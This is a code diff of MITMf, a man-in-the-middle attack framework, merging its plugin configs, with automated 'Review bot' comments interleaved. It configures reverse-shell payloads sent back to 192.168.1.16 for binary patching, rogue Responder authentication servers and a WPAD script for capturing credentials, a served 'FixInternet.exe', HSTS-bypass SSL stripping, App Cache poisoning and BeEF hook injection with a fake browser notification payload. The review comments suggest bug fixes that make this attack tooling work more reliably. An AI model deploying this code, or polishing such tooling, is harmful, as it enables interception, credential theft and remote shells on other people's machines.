ZERO_CERT = True
|
||||||
|
PATCH_DLL = False
|
||||||
|
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[[MachoIntelx86]]]]
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 4444
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[[MachoIntelx64]]]]
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 5555
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
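Review bot: The value for `'Fake Notification Bar (Chrome)'` under `[BeEFAutorun]` → `[[[Windows 7]]]` → `[[[[C]]]]` is malformed — the key `"notification_text:` is missing its closing quote, so if the plugin decodes that string as JSON (as the surrounding `{...}` values suggest) it will fail for every Windows 7 + Chrome client; the line should read `'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'`. The same defect was present in the deleted per-plugin config and the consolidation carried it over unchanged. In `[FilePwn]` → `[[[[WindowsIntelx64]]]]`, `SUPPLIED_SHELLCODE = Nonepatchpatchpatch` looks like an editing accident also carried over from the old file — every sibling target uses `None`, so `SUPPLIED_SHELLCODE = None` is presumably intended; confirm against how FilePwn reads that key before changing it. In `[Responder]`, the comment and commented example above `RespondToName =` still say `RespondTo` (`#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT` and `#RespondTo = WPAD,DEV,PROD,SQLINT`); both should name `RespondToName` so they document the key they sit above. The `[MITMf]` comment above `args=''` also has a typo, `assuming you config file` → `assuming your config file`.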
@ -1,59 +0,0 @@
|
||||||
[Responder Core]
|
|
||||||
;;
|
|
||||||
;Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
|
||||||
SQL = On
|
|
||||||
SMB = On
|
|
||||||
Kerberos = On
|
|
||||||
FTP = On
|
|
||||||
POP = On
|
|
||||||
;;Listen on 25/TCP, 587/TCP
|
|
||||||
SMTP = On
|
|
||||||
IMAP = On
|
|
||||||
HTTP = On
|
|
||||||
HTTPS = On
|
|
||||||
DNS = On
|
|
||||||
LDAP = On
|
|
||||||
;
|
|
||||||
;Set a custom challenge
|
|
||||||
Challenge = 1122334455667788
|
|
||||||
;
|
|
||||||
;Set this to change the default logging file
|
|
||||||
SessionLog = Responder-Session.log
|
|
||||||
;
|
|
||||||
;Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
|
||||||
;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
|
||||||
RespondTo =
|
|
||||||
;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
|
|
||||||
;RespondTo = WPAD,DEV,PROD,SQLINT
|
|
||||||
RespondToName =
|
|
||||||
;
|
|
||||||
;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
|
||||||
DontRespondTo =
|
|
||||||
;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
|
|
||||||
DontRespondToName =
|
|
||||||
;
|
|
||||||
[HTTP Server]
|
|
||||||
;;
|
|
||||||
;Set this to On if you want to always serve a specific file to the victim.
|
|
||||||
Serve-Always = Off
|
|
||||||
;
|
|
||||||
;Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
|
|
||||||
Serve-Exe = Off
|
|
||||||
;
|
|
||||||
;Uncomment and specify a custom file to serve, the file must exist.
|
|
||||||
Filename = config/responder/Denied.html
|
|
||||||
;
|
|
||||||
;Specify a custom executable file to serve, the file must exist.
|
|
||||||
ExecFilename = config/responder/FixInternet.exe
|
|
||||||
;
|
|
||||||
;Set your custom PAC script
|
|
||||||
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
|
|
||||||
;
|
|
||||||
[HTTPS Server]
|
|
||||||
;
|
|
||||||
;Change to use your certs
|
|
||||||
cert = config/responder/certs/responder.crt
|
|
||||||
key = config/responder/certs/responder.key
|
|
||||||
;
|
|
||||||
|
|
||||||
|
|
|
@ -16,7 +16,7 @@
|
||||||
# You should have received a copy of the GNU General Public License
|
# You should have received a copy of the GNU General Public License
|
||||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||||
|
|
||||||
import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time
|
import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,BaseHTTPServer, select,urlparse,zlib, string, time
|
||||||
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
|
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
|
||||||
from Fingerprint import RunSmbFinger,OsNameClientVersion
|
from Fingerprint import RunSmbFinger,OsNameClientVersion
|
||||||
from odict import OrderedDict
|
from odict import OrderedDict
|
||||||
|
@ -24,45 +24,6 @@ from socket import inet_aton
|
||||||
from random import randrange
|
from random import randrange
|
||||||
from libs.sslstrip.DnsCache import DnsCache
|
from libs.sslstrip.DnsCache import DnsCache
|
||||||
|
|
||||||
VERSION = '2.1.2'
|
|
||||||
|
|
||||||
#Config parsing
|
|
||||||
config = ConfigParser.ConfigParser()
|
|
||||||
config.read("./config/responder/responder.conf")
|
|
||||||
|
|
||||||
# Set some vars.
|
|
||||||
On_Off = config.get('Responder Core', 'HTTP').upper()
|
|
||||||
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
|
|
||||||
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
|
|
||||||
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
|
|
||||||
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
|
|
||||||
POP_On_Off = config.get('Responder Core', 'POP').upper()
|
|
||||||
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
|
|
||||||
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
|
|
||||||
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
|
|
||||||
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
|
|
||||||
Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
|
|
||||||
NumChal = config.get('Responder Core', 'Challenge')
|
|
||||||
SessionLog = config.get('Responder Core', 'SessionLog')
|
|
||||||
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
|
|
||||||
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
|
|
||||||
FILENAME = config.get('HTTP Server', 'Filename')
|
|
||||||
WPAD_Script = config.get('HTTP Server', 'WPADScript')
|
|
||||||
#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
|
|
||||||
RespondTo = config.get('Responder Core', 'RespondTo').strip()
|
|
||||||
RespondTo.split(",")
|
|
||||||
RespondToName = config.get('Responder Core', 'RespondToName').strip()
|
|
||||||
RespondToName.split(",")
|
|
||||||
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
|
|
||||||
DontRespondTo.split(",")
|
|
||||||
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
|
|
||||||
DontRespondToName.split(",")
|
|
||||||
|
|
||||||
HTMLToServe = ''
|
|
||||||
|
|
||||||
if len(NumChal) is not 16:
|
|
||||||
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
|
|
||||||
|
|
||||||
def IsOsX():
|
def IsOsX():
|
||||||
Os_version = sys.platform
|
Os_version = sys.platform
|
||||||
if Os_version == "darwin":
|
if Os_version == "darwin":
|
||||||
|
@ -151,11 +112,6 @@ def PrintLLMNRNBTNS(outfile,Message):
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
|
|
||||||
Challenge = ""
|
|
||||||
for i in range(0,len(NumChal),2):
|
|
||||||
Challenge += NumChal[i:i+2].decode("hex")
|
|
||||||
|
|
||||||
#Packet class handling all packet generation (see odict.py).
|
#Packet class handling all packet generation (see odict.py).
|
||||||
class Packet():
|
class Packet():
|
||||||
fields = OrderedDict([
|
fields = OrderedDict([
|
||||||
|
@ -2021,8 +1977,8 @@ class SSlSock(ThreadingMixIn, TCPServer):
|
||||||
def __init__(self, server_address, RequestHandlerClass):
|
def __init__(self, server_address, RequestHandlerClass):
|
||||||
BaseServer.__init__(self, server_address, RequestHandlerClass)
|
BaseServer.__init__(self, server_address, RequestHandlerClass)
|
||||||
ctx = SSL.Context(SSL.SSLv3_METHOD)
|
ctx = SSL.Context(SSL.SSLv3_METHOD)
|
||||||
cert = config.get('HTTPS Server', 'cert')
|
cert = SSLcert
|
||||||
key = config.get('HTTPS Server', 'key')
|
key = SSLkey
|
||||||
ctx.use_privatekey_file(key)
|
ctx.use_privatekey_file(key)
|
||||||
ctx.use_certificate_file(cert)
|
ctx.use_certificate_file(cert)
|
||||||
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
|
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
|
||||||
|
@ -2483,7 +2439,51 @@ def serve_thread_SSL(host, port, handler):
|
||||||
except Exception, e:
|
except Exception, e:
|
||||||
print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
|
print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
|
||||||
|
|
||||||
def start_responder(options, ip_address):
|
def start_responder(options, ip_address, config):
|
||||||
|
|
||||||
|
global VERSION; VERSION = '2.1.2'
|
||||||
|
|
||||||
|
# Set some vars.
|
||||||
|
global On_Off; On_Off = config['HTTP'].upper()
|
||||||
|
global SSL_On_Off; SSL_On_Off = config['HTTPS'].upper()
|
||||||
|
global SMB_On_Off; SMB_On_Off = config['SMB'].upper()
|
||||||
|
global SQL_On_Off; SQL_On_Off = config['SQL'].upper()
|
||||||
|
global FTP_On_Off; FTP_On_Off = config['FTP'].upper()
|
||||||
|
global POP_On_Off; POP_On_Off = config['POP'].upper()
|
||||||
|
global IMAP_On_Off; IMAP_On_Off = config['IMAP'].upper()
|
||||||
|
global SMTP_On_Off; SMTP_On_Off = config['SMTP'].upper()
|
||||||
|
global LDAP_On_Off; LDAP_On_Off = config['LDAP'].upper()
|
||||||
|
global DNS_On_Off; DNS_On_Off = config['DNS'].upper()
|
||||||
|
global Krb_On_Off; Krb_On_Off = config['Kerberos'].upper()
|
||||||
|
global NumChal; NumChal = config['Challenge']
|
||||||
|
global SessionLog; SessionLog = config['SessionLog']
|
||||||
|
global Exe_On_Off; Exe_On_Off = config['HTTP Server']['Serve-Exe'].upper()
|
||||||
|
global Exec_Mode_On_Off; Exec_Mode_On_Off = config['HTTP Server']['Serve-Always'].upper()
|
||||||
|
global FILENAME; FILENAME = config['HTTP Server']['Filename']
|
||||||
|
global WPAD_Script; WPAD_Script = config['HTTP Server']['WPADScript']
|
||||||
|
#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
|
||||||
|
|
||||||
|
global SSLcert; SSLcert = config['HTTPS Server']['cert']
|
||||||
|
global SSLkey; SSLkey = config['HTTPS Server']['key']
|
||||||
|
|
||||||
|
global RespondTo; RespondTo = config['RespondTo'].strip()
|
||||||
|
RespondTo.split(",")
|
||||||
|
global RespondToName; RespondToName = config['RespondToName'].strip()
|
||||||
|
RespondToName.split(",")
|
||||||
|
global DontRespondTo; DontRespondTo = config['DontRespondTo'].strip()
|
||||||
|
DontRespondTo.split(",")
|
||||||
|
global DontRespondToName; DontRespondToName = config['DontRespondToName'].strip()
|
||||||
|
DontRespondToName.split(",")
|
||||||
|
|
||||||
|
HTMLToServe = ''
|
||||||
|
|
||||||
|
if len(NumChal) is not 16:
|
||||||
|
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
|
||||||
|
|
||||||
|
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
|
||||||
|
global Challange; Challenge = ""
|
||||||
|
for i in range(0,len(NumChal),2):
|
||||||
|
Challenge += NumChal[i:i+2].decode("hex")
|
||||||
|
|
||||||
#Cli options.
|
#Cli options.
|
||||||
global OURIP; OURIP = ip_address
|
global OURIP; OURIP = ip_address
|
||||||
|
|
|
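Review bot: `global Challange; Challenge = ""` at L3118 misspells the global, so `Challenge` becomes a local of start_responder and the module-level Challenge that the NTLM handlers read is never populated; the line should be `global Challenge; Challenge = ""`. The `len(NumChal) is not 16` test at L3103 compares with identity rather than `!=` and does not check that the value is hex, so a 16-character non-hex Challenge only fails later in `.decode("hex")`; `if len(NumChal) != 16 or not re.match(r'^[0-9a-fA-F]{16}$', NumChal):` covers both at the point of validation (re is already imported on L2644). Note also that sys.exit() raised inside start_responder only ends the calling thread when the function is run from a daemon thread, as the Responder plugin in this commit does, so these checks do not stop MITMf. start_responder continues past the end of the hunk.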
@ -18,7 +18,6 @@
|
||||||
|
|
||||||
import re, os
|
import re, os
|
||||||
import logging
|
import logging
|
||||||
from configobj import ConfigObj
|
|
||||||
|
|
||||||
class URLMonitor:
|
class URLMonitor:
|
||||||
|
|
||||||
|
@ -44,12 +43,7 @@ class URLMonitor:
|
||||||
self.redirects = []
|
self.redirects = []
|
||||||
self.faviconReplacement = False
|
self.faviconReplacement = False
|
||||||
self.hsts = False
|
self.hsts = False
|
||||||
|
self.hsts_config = None
|
||||||
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
|
|
||||||
|
|
||||||
for k,v in hsts_config.items():
|
|
||||||
self.sustitucion[k] = v
|
|
||||||
self.real[v] = k
|
|
||||||
|
|
||||||
def isSecureLink(self, client, url):
|
def isSecureLink(self, client, url):
|
||||||
for expression in URLMonitor.javascriptTrickery:
|
for expression in URLMonitor.javascriptTrickery:
|
||||||
|
@ -138,9 +132,19 @@ class URLMonitor:
|
||||||
self.strippedURLs.add((client, url))
|
self.strippedURLs.add((client, url))
|
||||||
self.strippedURLPorts[(client, url)] = int(port)
|
self.strippedURLPorts[(client, url)] = int(port)
|
||||||
|
|
||||||
def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,):
|
def setFaviconSpoofing(self, faviconSpoofing):
|
||||||
self.faviconSpoofing = faviconSpoofing
|
self.faviconSpoofing = faviconSpoofing
|
||||||
self.hsts = hstsbypass
|
|
||||||
|
def setHstsBypass(self, hstsconfig):
|
||||||
|
if hstsconfig:
|
||||||
|
self.hsts = True
|
||||||
|
self.hsts_config = hstsconfig
|
||||||
|
|
||||||
|
for k,v in self.hsts_config.items():
|
||||||
|
self.sustitucion[k] = v
|
||||||
|
self.real[v] = k
|
||||||
|
|
||||||
|
def setClientLogging(self, clientLogging):
|
||||||
self.clientLogging = clientLogging
|
self.clientLogging = clientLogging
|
||||||
|
|
||||||
def isFaviconSpoofing(self):
|
def isFaviconSpoofing(self):
|
||||||
|
|
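Review bot: setHstsBypass at L3263 treats every entry of the section as a flat hostname-to-substitute string pair (`self.real[v] = k`), so a ConfigObj subsection or list value under [SSLstrip+] would raise TypeError (unhashable) or silently build a wrong mapping, and two real hosts mapped to the same substitute overwrite each other in `self.real` without any warning. An empty or falsy section leaves `self.hsts` False without any message even though the plugin has already reported itself online. Suggest `if not isinstance(v, basestring): continue` inside the loop, a `logging.warning` when `v in self.real` already, and `logging.warning("HSTS bypass config is empty")` in an else branch. The removed setValues defaulted clientLogging to False; if URLMonitor.__init__ (outside the hunk) does not initialise self.clientLogging, readers of it now depend on setClientLogging having been called — worth confirming.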
35
mitmf.py
35
mitmf.py
|
@ -15,7 +15,7 @@ except:
|
||||||
sys.exit("[-] user_agents library not installed!")
|
sys.exit("[-] user_agents library not installed!")
|
||||||
|
|
||||||
try:
|
try:
|
||||||
import configobj
|
from configobj import ConfigObj
|
||||||
except:
|
except:
|
||||||
sys.exit("[-] configobj library not installed!")
|
sys.exit("[-] configobj library not installed!")
|
||||||
|
|
||||||
|
@ -29,21 +29,23 @@ sergio_version = "0.2.1"
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
|
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
|
||||||
|
#add MITMf options
|
||||||
|
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
|
||||||
|
mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
||||||
|
mgroup.add_argument("-i", "--interface", type=str, metavar="interface" ,help="Interface to listen on")
|
||||||
|
mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.cfg", metavar='configfile', help="Specify config file to use")
|
||||||
|
mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies')
|
||||||
#add sslstrip options
|
#add sslstrip options
|
||||||
sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library")
|
sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library")
|
||||||
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
|
#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
|
||||||
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
|
|
||||||
slogopts = sgroup.add_mutually_exclusive_group()
|
slogopts = sgroup.add_mutually_exclusive_group()
|
||||||
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
|
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
|
||||||
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
|
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
|
||||||
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
|
slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.")
|
||||||
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
|
#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet
|
||||||
sgroup.add_argument("-i", "--interface", type=str, required=True, metavar="interface" ,help="Interface to listen on")
|
|
||||||
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
|
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
|
||||||
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
|
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
|
||||||
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
|
||||||
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
|
|
||||||
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass")
|
|
||||||
|
|
||||||
#Initialize plugins
|
#Initialize plugins
|
||||||
plugins = []
|
plugins = []
|
||||||
|
@ -69,6 +71,23 @@ if __name__ == "__main__":
|
||||||
|
|
||||||
args = parser.parse_args()
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
try:
|
||||||
|
configfile = ConfigObj(args.configfile)
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config file: " + str(e))
|
||||||
|
|
||||||
|
config_args = configfile['MITMf']['args']
|
||||||
|
if config_args:
|
||||||
|
print "[*] Loading arguments from config file"
|
||||||
|
for arg in config_args.split(' '):
|
||||||
|
sys.argv.append(arg)
|
||||||
|
args = parser.parse_args()
|
||||||
|
|
||||||
|
if not args.interface:
|
||||||
|
sys.exit("[-] -i , --interface argument is required")
|
||||||
|
|
||||||
|
args.configfile = configfile #so we can pass the configobj down to all the plugins
|
||||||
|
|
||||||
log_level = logging.__dict__[args.log_level.upper()]
|
log_level = logging.__dict__[args.log_level.upper()]
|
||||||
|
|
||||||
#Start logging
|
#Start logging
|
||||||
|
@ -84,7 +103,7 @@ if __name__ == "__main__":
|
||||||
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
|
print "[*] MITMf v%s started... initializing plugins and modules" % mitmf_version
|
||||||
if ('--responder' and '--wpad') in sys.argv:
|
if ('--responder' and '--wpad') in sys.argv:
|
||||||
args.listen = 3141
|
args.listen = 3141
|
||||||
print "[*] Listening on port 3141 since --wpad was passed"
|
print "[*] SSLstrip is now listening on port 3141 since --wpad was passed"
|
||||||
|
|
||||||
load = []
|
load = []
|
||||||
try:
|
try:
|
||||||
|
@ -103,7 +122,7 @@ if __name__ == "__main__":
|
||||||
from libs.sslstrip.StrippingProxy import StrippingProxy
|
from libs.sslstrip.StrippingProxy import StrippingProxy
|
||||||
from libs.sslstrip.URLMonitor import URLMonitor
|
from libs.sslstrip.URLMonitor import URLMonitor
|
||||||
|
|
||||||
URLMonitor.getInstance().setValues(args.favicon, args.hsts)
|
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
|
||||||
CookieCleaner.getInstance().setEnabled(args.killsessions)
|
CookieCleaner.getInstance().setEnabled(args.killsessions)
|
||||||
ProxyPlugins.getInstance().setPlugins(load)
|
ProxyPlugins.getInstance().setPlugins(load)
|
||||||
|
|
||||||
|
|
|
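Review bot: `config_args.split(' ')` at L3526 breaks on double spaces or quoted values (an empty token becomes a bogus argument and argparse errors out), and because the tokens are appended to sys.argv, options from the config file override the ones typed on the command line since argparse keeps the last value. `shlex.split(config_args)` handles quoting, and inserting the tokens before the CLI ones with `sys.argv[1:1] = shlex.split(config_args)` lets explicit flags win. `configfile['MITMf']['args']` at L3514 is outside the try, so a config without that key dies with a raw KeyError instead of the formatted message; `configfile['MITMf'].get('args', '')` avoids that. The pre-existing `('--responder' and '--wpad') in sys.argv` on L3580 only evaluates the `--wpad` membership test and is unchanged by this commit.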
@ -1,15 +1,14 @@
|
||||||
#
|
|
||||||
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
||||||
#######################################################################################################
|
|
||||||
|
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from datetime import date
|
from datetime import date
|
||||||
from libs.sslstrip.URLMonitor import URLMonitor
|
from libs.sslstrip.URLMonitor import URLMonitor
|
||||||
import logging
|
import logging
|
||||||
import ConfigParser
|
|
||||||
import re
|
import re
|
||||||
import os.path
|
import os.path
|
||||||
import time
|
import time
|
||||||
|
import sys
|
||||||
|
|
||||||
class AppCachePlugin(Plugin):
|
class AppCachePlugin(Plugin):
|
||||||
name = "App Cache Poison"
|
name = "App Cache Poison"
|
||||||
|
@ -21,24 +20,15 @@ class AppCachePlugin(Plugin):
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
'''Called if plugin is enabled, passed the options namespace'''
|
||||||
self.options = options
|
self.options = options
|
||||||
self.config_file = "./config/app_cache_poison.cfg"
|
|
||||||
self.config = None
|
|
||||||
self.mass_poisoned_browsers = []
|
self.mass_poisoned_browsers = []
|
||||||
self.urlMonitor = URLMonitor.getInstance()
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
|
|
||||||
|
try:
|
||||||
|
self.config = options.configfile['AppCachePoison']
|
||||||
|
except Exception, e:
|
||||||
|
sys.exit("[-] Error parsing config file for AppCachePoison: " + str(e))
|
||||||
|
|
||||||
print "[*] App Cache Poison plugin online"
|
print "[*] App Cache Poison plugin online"
|
||||||
self.createTamperer(self.config_file)
|
|
||||||
|
|
||||||
def parseConfig(self, configFile):
|
|
||||||
config = ConfigParser.ConfigParser()
|
|
||||||
config.read(configFile)
|
|
||||||
readConfig = config._sections
|
|
||||||
readConfig.update(config.defaults())
|
|
||||||
return readConfig
|
|
||||||
|
|
||||||
def createTamperer(self, configFile):
|
|
||||||
logging.debug("Reading tamper config file: %s" % (configFile))
|
|
||||||
self.config = self.parseConfig(configFile)
|
|
||||||
|
|
||||||
def handleResponse(self, request, data):
|
def handleResponse(self, request, data):
|
||||||
|
|
||||||
|
@ -55,12 +45,12 @@ class AppCachePlugin(Plugin):
|
||||||
|
|
||||||
urls = self.urlMonitor.getRedirectionSet(url)
|
urls = self.urlMonitor.getRedirectionSet(url)
|
||||||
|
|
||||||
(s,element,url) = self.getSectionForUrls(urls)
|
(name,s,element,url) = self.getSectionForUrls(urls)
|
||||||
if not s:
|
if s is False:
|
||||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
||||||
return {'request': request, 'data': data}
|
return {'request': request, 'data': data}
|
||||||
|
|
||||||
logging.debug("Found URL %s in section %s" % (url, s['__name__']))
|
logging.debug("Found URL %s in section %s" % (url, name))
|
||||||
p = self.getTemplatePrefix(s)
|
p = self.getTemplatePrefix(s)
|
||||||
if element == 'tamper':
|
if element == 'tamper':
|
||||||
logging.debug("Poisoning tamper URL with template %s" % (p))
|
logging.debug("Poisoning tamper URL with template %s" % (p))
|
||||||
|
@ -160,12 +150,12 @@ class AppCachePlugin(Plugin):
|
||||||
|
|
||||||
def getTemplatePrefix(self, section):
|
def getTemplatePrefix(self, section):
|
||||||
if section.has_key('templates'):
|
if section.has_key('templates'):
|
||||||
return self.config['templates_path'] + '/' + section['templates']
|
return self.config['templates_path'] + '/' + section['templates']
|
||||||
|
|
||||||
return self.getDefaultTemplatePrefix()
|
return self.getDefaultTemplatePrefix()
|
||||||
|
|
||||||
def getDefaultTemplatePrefix(self):
|
def getDefaultTemplatePrefix(self):
|
||||||
return self.config['templates_path'] + '/default'
|
return self.config['templates_path'] + '/default'
|
||||||
|
|
||||||
def getManifestUrl(self, section):
|
def getManifestUrl(self, section):
|
||||||
return section.get("manifest_url",'/robots.txt')
|
return section.get("manifest_url",'/robots.txt')
|
||||||
|
@ -175,15 +165,16 @@ class AppCachePlugin(Plugin):
|
||||||
for i in self.config:
|
for i in self.config:
|
||||||
if isinstance(self.config[i], dict): #section
|
if isinstance(self.config[i], dict): #section
|
||||||
section = self.config[i]
|
section = self.config[i]
|
||||||
|
name = i
|
||||||
if section.get('tamper_url',False) == url:
|
if section.get('tamper_url',False) == url:
|
||||||
return (section, 'tamper',url)
|
return (name, section, 'tamper',url)
|
||||||
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
||||||
return (section, 'tamper',url)
|
return (name, section, 'tamper',url)
|
||||||
if section.get('manifest_url',False) == url:
|
if section.get('manifest_url',False) == url:
|
||||||
return (section, 'manifest',url)
|
return (name, section, 'manifest',url)
|
||||||
if section.get('raw_url',False) == url:
|
if section.get('raw_url',False) == url:
|
||||||
return (section, 'raw',url)
|
return (name, section, 'raw',url)
|
||||||
|
|
||||||
return (False,'',urls.copy().pop())
|
return (None, False,'',urls.copy().pop())
|
||||||
|
|
||||||
|
|
||||||
|
|
|
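Review bot: The `except Exception` around `options.configfile['AppCachePoison']` at L3762-L3774 reports any error as a config-parsing failure, while `self.config['templates_path']` at L3917 and L3938 is read outside it, so a section that exists but lacks templates_path still dies with a raw KeyError at request time inside handleResponse. Narrow the guard to `except KeyError, e: sys.exit("[-] Missing [AppCachePoison] section in config file: %s" % e)` and check `'templates_path' in self.config` in initialize. getSectionForUrls treats every nested dict in the section as a target entry and feeds `tamper_url_match` straight to `re.search`; that is operator-controlled config, but an invalid pattern raises re.error per request rather than at startup, so compiling the patterns once in initialize would surface the mistake earlier.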
@ -9,11 +9,6 @@ import json
|
||||||
import threading
|
import threading
|
||||||
import libs.beefapi as beefapi
|
import libs.beefapi as beefapi
|
||||||
|
|
||||||
try:
|
|
||||||
from configobj import ConfigObj
|
|
||||||
except:
|
|
||||||
sys.exit('[-] configobj library not installed!')
|
|
||||||
|
|
||||||
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
requests_log = logging.getLogger("requests") #Disables "Starting new HTTP Connection (1)" log message
|
||||||
requests_log.setLevel(logging.WARNING)
|
requests_log.setLevel(logging.WARNING)
|
||||||
|
|
||||||
|
@ -25,10 +20,17 @@ class BeefAutorun(Inject, Plugin):
|
||||||
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
||||||
|
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
self.options = options
|
self.options = options
|
||||||
|
|
||||||
beefconfig = ConfigObj("./config/mitmf.cfg")['BeEF']
|
try:
|
||||||
